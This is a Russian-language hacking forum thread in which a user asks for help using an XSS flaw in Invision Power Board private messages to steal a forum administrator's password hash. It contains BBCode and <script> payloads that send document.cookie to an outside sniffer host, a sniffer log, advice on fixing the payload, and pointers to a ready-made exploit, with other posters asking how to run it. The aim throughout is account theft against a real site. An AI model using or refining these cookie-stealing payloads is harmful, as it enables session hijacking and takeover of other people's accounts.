Вопрос про проведению атаки класса XSS, в форуме Invison Power Board

НАРОД СРОЧНО ПОМОГИТЕ!!!КОРОЧЕ НАШЁЛ ФОРУМ Invison Power Board.

Когда в приватном сообщении отправляю :

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:alert()) [/COLOR]

То при прочтении это письма выбрасывается окошко,где ничего не написано.

Когда вставлю :

[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) [/COLOR]


То при прочтении его,ничего в письме не написано,а в логах античата написан IP,но не мой,но моей страны,а так же ничего больше не написано в логах :

[Tue May 31 17:39:19 2005] IP=62.148.156.202 SITE=
REFERER=
QUERY=
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.54u1 [en]

Вот такое сообщение.Пожалуйста напишите как преобразовать,чтоб заполучить хэш.Тоесть что добавить или чё делать,чтоб при отправке кода админу,я бы получил в логах снифера хэш пароля.

ПОЖАЛУЙСТА ПОМОГИТЕ!!!!!1

 

Если нет элемента (картинки) с номером 68, то не сработает ...
попробуй

Code:

images[0].src=

 

Бля не мучайся скачай эксплойт с securitylab.ru и всё.

 

SanyaX можешь дать мне ссылку где скачать эксплойт

 

ЧеГевара ты что написал images[0].src= Это вместо той картинки вставить?

 

Все изображения в хтмл-документе представляются через массив images, который в свою очередь является свойством document-объекта. Изображение получает номер, так принято, что первое изображение получает 0, второе 1, третье 2 и т.д.

В примере взятом с http://antichat.ru/sniff/

HTML:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Создается новый Image-объект с именем img ... Затем определяется адрес изображения, представляемое через обект img ( а src - обязательный атрибут, указывающий URL рисунка (с) справочник =)) + через cgi-запрос передается содержавние cookies для текущего документа ...
Ситуация с твоим примером аналогична, за исключением лишь того факта, что используется уже существующий Image-объект ... Но если он не будет найден на странице, то это вызовет ошибку ...

 

А какая вкрсия инвижена? если <2.0.4 то тебе сюда
http://rst.void.ru/download/r57ipb2.txt
смысл парицца с xss?

 

Grrl
извини... а мона тупой вопрос?? а как кмопилировать сплойт?? где взять прогу или что вообще как, можешь объяснить?? плиз..

 

Перл это не компилируемый язык,а интерпретируемый.

 

специалисты утверждают что вопреки расхожему мнению, перл - компилируемый
(не придираясь к словам, а так, в кач-ве интересного факта)

 

qBiN
ээ... ну а как запустить то этот сплойт???

ну млин... =( объясните, как запустить данный сплойт, чтобы получить хэш админа..